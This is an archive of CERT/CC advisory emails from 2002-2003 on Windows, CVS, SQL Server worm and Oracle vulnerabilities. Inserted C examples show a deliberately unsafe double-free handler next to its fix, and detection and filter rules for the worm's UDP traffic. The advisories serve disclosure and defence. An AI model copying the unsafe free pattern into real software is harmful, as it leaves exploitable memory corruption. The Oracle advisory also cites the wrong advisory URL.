From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-37 Buffer Overflow in Microsoft Windows Shell Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 72 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-37 Buffer Overflow in Microsoft Windows Shell Original release date: December 19, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * All versions of Microsoft Windows XP Overview A buffer overflow vulnerability exists in the Microsoft Windows Shell. An attacker can exploit this vulnerability by enticing a victim to read a malicious email message, visit a malicious web page, or browse to a folder containing a malicious .MP3 or .WMA file. The attacker can then execute arbitrary code with the privileges of the victim. I. Description The Microsoft Windows Shell provides the basic human-computer interface for Windows systems. Browsing local and remote folders, running wizards, and performing configuration tasks are examples of operations utilizing the Windows Shell. Microsoft describes the Windows Shell as follows: The Windows Shell is responsible for providing the basic framework of the Windows user interface experience. It is most familiar to users as the Windows Desktop, but also provides a variety of other functions to help define the user's computing session, including organizing files and folders, and providing the means to start applications. A vulnerability exists in the Windows Shell function used to extract attribute information from audio files. This function is invoked automatically when a user browses to a folder containing .MP3 or .WMA files. 
Further information about this vulnerability can be found in the following documents: Foundstone Research Labs Advisory FS2002-11 Microsoft Security Bulletin MS02-072 CERT/CC Vulnerability Note VU#591890 A CVE candidate (CAN-2002-1327) has been assigned as well. II. Impact An attacker can either execute arbitrary code (which would run with the privileges of the victim) or crash the Windows Shell. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Note that Microsoft is actively deploying the patch for this vulnerability via Windows Update. Appendix A. - Vendor Information Microsoft Corporation Please see http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-072.asp. Appendix B. - References 1. Foundstone Research Labs Advisory FS2002-11 - http://www.foundstone.com/knowledge/randd-advisories-display.html?id=339 2. Microsoft Security Bulletin MS02-072 - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-072.asp 3. CERT/CC Vulnerability Note VU#591890 - http://www.kb.cert.org/vuls/id/591890 4. CVE CAN-2002-1327 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1327 _________________________________________________________________ Foundstone Research Labs discovered this vulnerability. _________________________________________________________________ Author: Ian A. Finlay. 
______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-37.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

December 19, 2002: Initial release

From - Wed Jan 22 21:59:45 2003
Date: Wed, 22 Jan 2003 18:57:50 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-02 Double-Free Bug in CVS Server

CERT Advisory CA-2003-02 Double-Free Bug in CVS Server

Original issue date: January 22, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

   * Systems running CVS Home project versions of CVS prior to 1.11.5
   * Operating system distributions that provide CVS
   * Source code repositories managed by CVS
   * For detailed vendor status information, see VU#650937:

Overview

A "double-free" vulnerability in the Concurrent Versions System (CVS) server could allow an unauthenticated, remote attacker with read-only access to execute arbitrary code, alter program operation, read sensitive information, or cause a denial of service.

I. Description

CVS is a version control and collaboration system that is widely used by open-source software development projects. CVS is commonly configured to allow public, anonymous, read-only access via the Internet.

The CVS server component contains a "double-free" vulnerability that can be triggered by a set of specially crafted directory requests. While processing these requests, an error-checking routine may attempt to free() the same memory reference more than once. Deallocating the already freed memory leads to heap corruption, which an attacker could leverage to execute arbitrary code, alter the logical operation of the CVS server program, or read sensitive information stored in memory. In most cases, heap corruption will result in a segmentation fault, causing a denial of service.

The CVS server process is typically started by the Internet services daemon (inetd) and runs with root privileges.
Arbitrary code inserted by an attacker would therefore run with root privileges.

The CERT/CC is tracking this issue as VU#650937:

This reference number corresponds to CVE candidate CAN-2002-0059:

This issue was researched and reported by Stefan Esser of e-matters:

II. Impact

Depending on configuration, operating system, and platform architecture, a remote attacker with anonymous, read-only access to a vulnerable CVS server could execute arbitrary code, alter the operation of the server program, read sensitive information, or cause a denial of service.

There is also a significant secondary impact. An attacker who is able to compromise a CVS server could modify source-code repositories to contain Trojan horses, backdoors, or other malicious code.

III. Solution

Apply a patch or upgrade

Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A. below and the Systems Affected section of VU#650937 for further information:

Disable or restrict anonymous CVS access

As a temporary solution until patches or upgrades can be applied, or to improve the security of CVS servers in the long term, consider the following workarounds and configurations:

   * Disable anonymous CVS server access completely.
   * Block or restrict access to CVS servers from untrusted hosts and networks. Anonymous access to CVS servers using :cvspserver: is typically provided on port 2401/tcp.
   * Configure CVS servers to run in restricted (chroot) environments.
   * Host CVS servers on single-purpose, secured systems.

These workarounds and configurations are not complete solutions and will not prevent exploitation of this vulnerability. Other features inherent in CVS may give anonymous users the ability to gain shell access.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.
The Systems Affected section of VU#650937 contains additional vendor status information:

Conectiva

   Conectiva Linux is affected by this issue and updated packages are available at:

   6.0/SRPMS/cvs-1.10.8-5U60_3cl.src.rpm
   6.0/RPMS/cvs-1.10.8-5U60_3cl.i386.rpm
   6.0/RPMS/cvs-doc-1.10.8-5U60_3cl.i386.rpm
   7.0/SRPMS/cvs-1.11-7U70_2cl.src.rpm
   7.0/RPMS/cvs-1.11-7U70_2cl.i386.rpm
   7.0/RPMS/cvs-doc-1.11-7U70_2cl.i386.rpm
   8/SRPMS/cvs-1.11-9U80_2cl.i386.rpm
   8/RPMS/cvs-1.11-9U80_2cl.i386.rpm
   8/RPMS/cvs-doc-1.11-9U80_2cl.i386.rpm

   An official announcement is pending and will show up in our updates website at shortly.

Cray Inc.

   Cray Inc. supports CVS through their Cray Open Software (COS) package. COS 3.3 and earlier is vulnerable. A new CVS will be available shortly. Please contact your local Cray service representative if you need this new package.

CVS Home

   CVS release 1.11.5 addresses this issue for CVS servers. CVS clients are not affected.

Debian

   Debian has updated their distribution with DSA 233. For the stable distribution (woody) this problem has been fixed in version 1.11.1p1debian-8.1. For the old stable distribution (potato) this problem has been fixed in version 1.10.7-9.2. For the unstable distribution (sid) this problem will be fixed soon.

Hewlett-Packard

   SOURCE: Hewlett-Packard Company and Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company
   RE: x-reference SSRT3463

   Not Vulnerable:
      HP-UX
      HP-MPE/ix
      HP Tru64 UNIX
      HP NonStop Servers
      HP OpenVMS

   To report any security issue for any HP software products send email to

IBM

   The AIX operating system does not ship with CVS. However, CVS is available for installation on AIX from the Linux Affinity Toolbox. CVS versions 1.11.1p1-2 and earlier are vulnerable to the issues discussed in CERT Vulnerability Note VU#650937 and any advisories which follow. Users are advised to download CVS 1.11.1p1-3 from:

   Please note that the above address was wrapped to two lines.
   CVS 1.11.1p1-3 contains the security fixes made in CVS 1.11.5 to address these issues. This software is offered on an "as-is" basis.

Openwall GNU/*/Linux

   We don't yet re-distribute CVS in Openwall GNU/*/Linux. We do, however, provide public anonymous CVS access to a copy of our repository, hosted off a separate machine and in a chroot jail. Vulnerabilities of this kind in CVS were expected, and our anoncvs setup is mostly resistant to them: read-only access to the repository is achieved primarily with the use of regular Unix permissions, not controls built into CVS. The CVS LockDir option is used to direct CVS lock files to a separate directory tree, actually writable to the pseudo-user. Nevertheless, the anoncvs server has been upgraded to CVS 1.11.5 a few hours after it was released.

Red Hat, Inc.

   Red Hat Linux and Red Hat Linux Advanced Server shipped with a cvs package vulnerable to these issues. New cvs packages are now available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool.

   Red Hat Linux Advanced Server:
   Red Hat Linux:

Sun Microsystems Inc.

   Sun does not include CVS with Solaris and therefore Solaris is not affected by this issue. Sun Linux, versions 5.0.3 and below, does ship with a vulnerable CVS package. Sun recommends that CVS services be disabled on affected Sun Linux systems until patches are available for this issue. Sun will be publishing a Sun Alert for Sun Linux describing the patch information which will be available from:

Appendix B. References

   * CERT/CC Vulnerability Note VU#650937 -
   * e-matters Advisory 01/2003 -

_________________________________________________________________

This vulnerability was reported by Stefan Esser of e-matters.

_________________________________________________________________

Author: Art Manion.
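The error-path pattern that Section I of this advisory describes, as an added illustration that is not CVS source and not CERT/CC code: a checking routine frees buffers that its caller frees again, shown beside the fixed version in which ownership stays in one place and each pointer is nulled after release. The request handler, its field names, the ".." rejection rule and the small tracking allocator are all constructed for this example; the tracker counts a free() of a non-live pointer instead of performing it, so the bug is observable without corrupting the heap.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed example, not CVS source: the error-path pattern CA-2003-02
 * describes (a checking routine frees buffers that its caller frees again)
 * beside the fixed version. A tiny debug allocator records live pointers
 * and counts, instead of performing, any free() of a pointer that is not
 * live, so the double free becomes observable without heap corruption. */
#define MAX_LIVE 16
static void *live[MAX_LIVE];
static int double_free_count;

static void *tracked_alloc(size_t n) {
    void *p = malloc(n);
    for (int i = 0; p != NULL && i < MAX_LIVE; i++) {
        if (live[i] == NULL) { live[i] = p; break; }
    }
    return p;
}

/* Frees p only if it is a live allocation; otherwise records a double free.
 * (A real debug allocator would also quarantine freed blocks; omitted.) */
static void tracked_free(void *p) {
    if (p == NULL) return;                       /* free(NULL) is always legal */
    for (int i = 0; i < MAX_LIVE; i++) {
        if (live[i] == p) { live[i] = NULL; free(p); return; }
    }
    double_free_count++;
}

/* Returns the number of double frees recorded so far and resets the count. */
int double_frees_reset(void) {
    int n = double_free_count;
    double_free_count = 0;
    return n;
}

struct dir_request { char *name; char *repo; };  /* two heap buffers owned by the handler */

static char *dup_str(const char *s) {
    size_t n = strlen(s) + 1;
    char *d = tracked_alloc(n);
    if (d != NULL) memcpy(d, s, n);
    return d;
}

/* BEFORE: the checker frees the request's buffers when it rejects them ... */
static int check_request_unsafe(struct dir_request *r) {
    if (r->name == NULL || r->repo == NULL) return -1;
    if (strstr(r->name, "..") != NULL) {         /* constructed rejection rule */
        tracked_free(r->name);
        tracked_free(r->repo);
        return -1;
    }
    return 0;
}

/* ... and the caller, which cannot tell that they are gone, frees them again
 * on the error path: the same memory reference is freed twice. */
int handle_directory_unsafe(const char *name, const char *repo) {
    struct dir_request r = { dup_str(name), dup_str(repo) };
    int rc = check_request_unsafe(&r);
    tracked_free(r.name);
    tracked_free(r.repo);
    return rc;
}

/* AFTER: the checker only reports and never touches ownership. */
static int check_request(const struct dir_request *r) {
    if (r->name == NULL || r->repo == NULL) return -1;
    if (strstr(r->name, "..") != NULL) return -1;
    return 0;
}

/* Releases a buffer exactly once and nulls the owner's pointer, so a later
 * release of the same field is a harmless free(NULL). */
static void release(char **p) {
    tracked_free(*p);
    *p = NULL;
}

/* The owner frees on a single exit path, whatever the outcome. */
int handle_directory(const char *name, const char *repo) {
    struct dir_request r = { dup_str(name), dup_str(repo) };
    int rc = check_request(&r);
    release(&r.name);
    release(&r.repo);
    return rc;
}

int main(void) {
    handle_directory("../etc", "/cvsroot");
    printf("fixed handler, rejected request:  %d double frees\n", double_frees_reset());
    handle_directory_unsafe("../etc", "/cvsroot");
    printf("unsafe handler, rejected request: %d double frees\n", double_frees_reset());
    return 0;
}
```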
______________________________________________________________________

This document is available from:

_________________________________________________________________

Copyright 2003 Carnegie Mellon University.
Revision History

January 22, 2003: Initial release

From - Thu Jan 23 16:38:24 2003
Date: Thu, 23 Jan 2003 16:22:08 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-03 Buffer Overflow in Windows Locator Service

CERT Advisory CA-2003-03 Buffer Overflow in Windows Locator Service

Original issue date: January 23, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

   * Microsoft Windows NT 4.0
   * Microsoft Windows NT 4.0, Terminal Server Edition
   * Microsoft Windows 2000
   * Microsoft Windows XP

Overview

A buffer overflow vulnerability in the Microsoft Windows Locator service could allow a remote attacker to execute arbitrary code or cause the Windows Locator service to fail. This service is enabled and running by default on Windows 2000 domain controllers and Windows NT 4.0 domain controllers.

I. Description

A buffer overflow in the Windows Locator service may make it possible for a remote attacker to execute arbitrary code on a vulnerable system by sending an overly large request to the Windows Locator service. Microsoft describes the Windows Locator service as "a name service that maps logical names to network-specific names." From MS03-001:

   A client that is going to make a Remote Procedure Call (RPC) can call the Locator service to resolve a logical name for a network object to a network-specific name for use in the RPC. For example, if a print server has the logical name "laserprinter", an RPC client could call the Locator service to find out the network-specific name that mapped to "laserprinter". The RPC client uses the network-specific name when it makes the RPC call to the service.
Further information about this vulnerability can be found in Microsoft Security Bulletin MS03-001 and in CERT/CC Vulnerability Note VU#610986, which correspond to CVE candidate CAN-2003-0003.

II. Impact

A remote attacker may be able to execute arbitrary code on a vulnerable system, or cause the Windows Locator service to fail. An attacker who is able to compromise a domain controller might be able to cause the compromised domain controller to trust the attacker's domain.

III. Solution

Apply a patch

Disable vulnerable service

Until a patch can be applied, you may wish to disable the Windows Locator service. To determine if the Windows Locator service is running, Microsoft recommends the following:

   * The status of the "Remote Procedure Call (RPC) Locator" service and how it is started (automatically or manually) can be viewed in the Control Panel. For Windows 2000 and Windows XP, use Control Panel | Administrative Tools | Services, and on Windows NT 4.0, use Control Panel | Services.
   * It is also possible to determine the status of the Locator service from the command line by entering:

        net start

   * A list of services will be displayed. If "Remote Procedure Call (RPC) Locator" appears in the list, then the locator service is running.

To disable the Windows Locator service, Microsoft recommends the following:

   * An administrator can disable the Locator service by setting the RpcLocator service status to "disabled" in the services control panel.
   * The service can also be stopped via the command line using the sc.exe program, which ships with Windows XP and is included as part of the Windows 2000 Resource Kit. The following command will stop the service:

        sc stop RpcLocator

   * To disable the service using the command line tool, use the following:

        sc config RpcLocator start= disabled

Restrict access to NetBIOS

You may wish to block access to NetBIOS from outside your network perimeter. This will limit your exposure to attacks.
However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate.

As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable the Windows Locator service, carefully consider your service requirements.

Please also note that Microsoft is actively deploying the patches for this vulnerability via Windows Update.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft Corporation

   Please see Microsoft Security Bulletin MS03-001.

Appendix B. References

   * Microsoft Security Bulletin MS03-001 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-001.asp
   * CERT/CC Vulnerability Note VU#610986 - http://www.kb.cert.org/vuls/id/610986

_________________________________________________________________

This vulnerability was discovered by David Litchfield of Next Generation Security Software Ltd and was first described in MS03-001.

_________________________________________________________________

Author: Ian A. Finlay.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-03.html
_________________________________________________________________

Copyright 2003 Carnegie Mellon University.
Revision History

January 23, 2003: Initial release

From - Sat Jan 25 13:50:41 2003
Date: Sat, 25 Jan 2003 12:03:10 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-04 MS-SQL Server Worm

CERT Advisory CA-2003-04 MS-SQL Server Worm

Original release date: January 25, 2003
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Microsoft SQL Server 2000

Overview

The CERT/CC has received reports of self-propagating malicious code that exploits multiple vulnerabilities in the Resolution Service of Microsoft SQL Server 2000. The propagation of this worm has caused varied levels of network degradation across the Internet, in addition to the compromise of vulnerable machines.

I. Description

The worm targeting SQL Server computers is self-propagating malicious code that most likely exploits two vulnerabilities in the Resolution Service of Microsoft SQL Server 2000. The vulnerability documented in VU#370308 allows the keep-alive functionality employed by the SQL Server Resolution Service to launch a denial of service against other hosts. Either of the vulnerabilities VU#399260 and VU#484891 allows for the execution of arbitrary code on the SQL Server computer due to a buffer overflow.

   VU#370308 - http://www.kb.cert.org/vuls/id/370308
   VU#399260 - http://www.kb.cert.org/vuls/id/399260
   VU#484891 - http://www.kb.cert.org/vuls/id/484891

Reports to the CERT/CC indicate that the high volume of 1434/udp traffic generated between hosts infected with the worm targeting SQL Server computers may itself lead to performance issues (including possible denial-of-service conditions) on networks with infected hosts.
Activity of this worm is readily identifiable on a network by the presence of small UDP packets (we have received reports of 376-410 byte packets) from seemingly random IP addresses from across the Internet to port 1434/udp.

II. Impact

Compromise by the worm indicates that a remote attacker can execute arbitrary code as the local SYSTEM user on the victim system. It may be possible for an attacker to subsequently leverage a local privilege escalation exploit in order to gain Administrator access to the victim system.

The high volume of 1434/udp traffic generated between hosts infected with the worm may itself lead to performance issues on networks with both infected and targeted, but non-vulnerable, hosts.

III. Solution

Apply a patch

Administrators of all systems running Microsoft SQL Server 2000 are encouraged to review CA-2002-22 and VU#370308 for detailed vendor recommendations regarding installing the patch:

   http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp

   CA-2002-22 - http://www.cert.org/advisories/CA-2002-22.html
   VU#370308 - http://www.kb.cert.org/vuls/id/370308

Ingress/Egress filtering

The following steps are only effective in limiting the damage that can be done by systems already infected with the worm. They provide no protection whatsoever against the initial infection of systems. As a result, these steps are only recommended in addition to the preventative steps outlined above, not in lieu thereof.

Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. In the network usage policy of many sites, external hosts are only permitted to initiate inbound traffic to machines that provide public services on specific ports. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services.
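The network indicator given in Section I (small UDP datagrams of 376-410 bytes to 1434/udp) and the filter rule this Solution section gives (UDP with both source and destination port 1434), applied to a few flow-log lines. This is an added example, not CERT/CC code; the "proto=... src=... dst=... len=..." log format and the sample records are constructed for it, and the two predicates deliberately differ so that the output shows which records each one catches.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed example, not CERT/CC code: apply the CA-2003-04 indicators to
 * flow records. The log format ("proto=udp src=A:port dst=B:port len=N") is
 * invented for this example; real collectors differ. */
struct flow {
    char proto[4];   /* "udp" or "tcp" */
    int sport;       /* source port */
    int dport;       /* destination port */
    int bytes;       /* datagram length as logged */
};

/* Parses one log line into *f. Returns 0 on success, -1 on a malformed line. */
int parse_flow(const char *line, struct flow *f) {
    char src[64], dst[64];
    if (sscanf(line, "proto=%3s src=%63s dst=%63s len=%d",
               f->proto, src, dst, &f->bytes) != 4)
        return -1;
    const char *ps = strrchr(src, ':');
    const char *pd = strrchr(dst, ':');
    if (ps == NULL || pd == NULL) return -1;
    f->sport = atoi(ps + 1);
    f->dport = atoi(pd + 1);
    return 0;
}

/* Detection: the advisory's indicator is a small UDP datagram (reported as
 * 376-410 bytes) sent to port 1434/udp, whatever its source port. */
int looks_like_slammer(const struct flow *f) {
    return strcmp(f->proto, "udp") == 0 && f->dport == 1434
        && f->bytes >= 376 && f->bytes <= 410;
}

/* Filtering: the advisory's ingress/egress rule blocks UDP datagrams whose
 * source AND destination ports are both 1434, in either direction. */
int blocked_by_filter(const struct flow *f) {
    return strcmp(f->proto, "udp") == 0 && f->sport == 1434 && f->dport == 1434;
}

/* Single-line wrapper: -1 malformed, 0 clean, 1 matches the indicator. */
int line_is_suspicious(const char *line) {
    struct flow f;
    if (parse_flow(line, &f) != 0) return -1;
    return looks_like_slammer(&f);
}

/* Counts the lines for which pred() holds; unparseable lines are skipped. */
int count_matching(const char *const *lines, int n,
                   int (*pred)(const struct flow *)) {
    int hits = 0;
    for (int i = 0; i < n; i++) {
        struct flow f;
        if (parse_flow(lines[i], &f) == 0 && pred(&f)) hits++;
    }
    return hits;
}

/* Constructed sample log (RFC 5737 documentation addresses). */
#define SAMPLE_LOG_LEN 5
static const char *const SAMPLE_LOG[SAMPLE_LOG_LEN] = {
    "proto=udp src=198.51.100.7:1434 dst=192.0.2.10:1434 len=376",  /* indicator and filter both match */
    "proto=udp src=203.0.113.44:3121 dst=192.0.2.11:1434 len=404",  /* indicator matches; filter does not */
    "proto=udp src=192.0.2.5:53 dst=198.51.100.2:53 len=72",        /* ordinary DNS */
    "proto=tcp src=203.0.113.9:44511 dst=192.0.2.10:1433 len=1500", /* SQL Server over TCP, not UDP */
    "proto=udp src=192.0.2.12:1434 dst=203.0.113.8:1434 len=1200",  /* too large for the indicator; still filtered */
};

int main(void) {
    for (int i = 0; i < SAMPLE_LOG_LEN; i++) {
        struct flow f;
        if (parse_flow(SAMPLE_LOG[i], &f) != 0) {
            printf("malformed: %s\n", SAMPLE_LOG[i]);
            continue;
        }
        printf("%-62s suspicious=%d blocked=%d\n", SAMPLE_LOG[i],
               looks_like_slammer(&f), blocked_by_filter(&f));
    }
    return 0;
}
```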
Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet.

In the case of this worm, employing ingress and egress filtering can help prevent compromised systems on your network from attacking systems elsewhere. Blocking UDP datagrams with both source and destination ports 1434 from entering or leaving your network reduces the risk of external infected systems communicating with infected hosts inside your network.

Recovering from a system compromise

If you believe a system under your administrative control has been compromised, please follow the steps outlined in:

   Steps for Recovering from a UNIX or NT System Compromise
   http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Reporting

The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#35663]".

_________________________________________________________________

Feedback can be directed to the author: Roman Danyliw

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-04.html
_________________________________________________________________

Copyright 2003 Carnegie Mellon University.
Revision History

January 25, 2003: Initial release

From - Wed Feb 19 15:02:18 2003
Date: Wed, 19 Feb 2003 15:14:35 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers

CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers

Original release date: February 19, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Systems running Oracle9i Database (Release 1 and 2)
   * Systems running Oracle8i Database v 8.1.7
   * Systems running Oracle8 Database v 8.0.6
   * Systems running Oracle9i Application Server (Release 9.0.2 and 9.0.3)

Overview

Multiple vulnerabilities exist in Oracle software that may lead to execution of arbitrary code; the ability to read, modify, or delete information stored in underlying Oracle databases; or denial of service. All of these vulnerabilities were discovered by Next Generation Security Software Ltd.

I. Description

Multiple vulnerabilities exist in Oracle9i Application Server, Oracle9i Database, and Oracle8i Database. The majority of these vulnerabilities are buffer overflows. Oracle has published Security Alerts describing these vulnerabilities.
If you use Oracle products listed in the "Systems Affected" section of this document, we strongly encourage you to review the following Oracle Security Alerts and apply patches as appropriate:

   * Buffer Overflow in DIRECTORY parameter of Oracle9i Database Server
     http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf
   * Buffer Overflow in TZ_OFFSET function of Oracle9i Database Server
     http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf
   * Buffer Overflow in TO_TIMESTAMP_TZ function of Oracle9i Database Server
     http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf
   * Buffer Overflow in ORACLE.EXE binary of Oracle9i Database Server
     http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf
   * Two Vulnerabilities in Oracle9i Application Server
     http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf

NGSSoftware Insight Security Research Advisories describing these issues are listed below:

   * Oracle9i Application Server Format String Vulnerability
     http://www.nextgenss.com/advisories/ora-appservfmtst.txt
   * Oracle TO_TIMESTAMP_TZ Remote System Buffer Overrun
     http://www.nextgenss.com/advisories/ora-tmstmpbo.txt
   * ORACLE bfilename function buffer overflow vulnerability
     http://www.nextgenss.com/advisories/ora-bfilebo.txt
   * Oracle TZ_OFFSET Remote System Buffer Overrun
     http://www.nextgenss.com/advisories/ora-tzofstbo.txt
   * Oracle unauthenticated remote system compromise
     http://www.nextgenss.com/advisories/ora-unauthrm.txt

The CERT/CC has published vulnerability notes for each of these issues as well. The vulnerability in Oracle's mod_dav module (VU#849993) has been assigned CVE ID CAN-2002-0842.

II. Impact

Depending on the vulnerability being exploited, an attacker may be able to execute arbitrary code; read, modify, or delete information stored in underlying Oracle databases; or cause a denial of service. The vulnerabilities in "ORACLE.EXE" (VU#953746) and the WebDAV modules (VU#849993, VU#511194) may be exploited prior to authentication.

III. Solution

Apply a patch

Solutions for specific vulnerabilities can be found in the above referenced Oracle Security Alerts, NGSSoftware Insight Security Research Advisories, and individual CERT/CC Vulnerability Notes.

Mitigation Strategies

Until a patch can be applied, the CERT/CC recommends that vulnerable sites

   * disable unnecessary Oracle services
   * run Oracle services with the least privilege
   * restrict network access to Oracle services

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Oracle Corporation

   Please see the following Oracle Security Alerts:

   * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf

Appendix B. References

   * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf
   * http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf
   * http://www.nextgenss.com/advisories/ora-appservfmtst.txt
   * http://www.nextgenss.com/advisories/ora-tmstmpbo.txt
   * http://www.nextgenss.com/advisories/ora-bfilebo.txt
   * http://www.nextgenss.com/advisories/ora-tzofstbo.txt
   * http://www.nextgenss.com/advisories/ora-unauthrm.txt
   * http://www.kb.cert.org/vuls/id/743954
   * http://www.kb.cert.org/vuls/id/953746
   * http://www.kb.cert.org/vuls/id/663786
   * http://www.kb.cert.org/vuls/id/840666
   * http://www.kb.cert.org/vuls/id/511194
   * http://www.kb.cert.org/vuls/id/849993
   * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0842

_________________________________________________________________

The CERT/CC acknowledges both Next Generation Security Software Ltd. and Oracle for providing information upon which this document is based.

_________________________________________________________________

Feedback can be directed to the author: Ian A. Finlay.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-04.html
Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. 
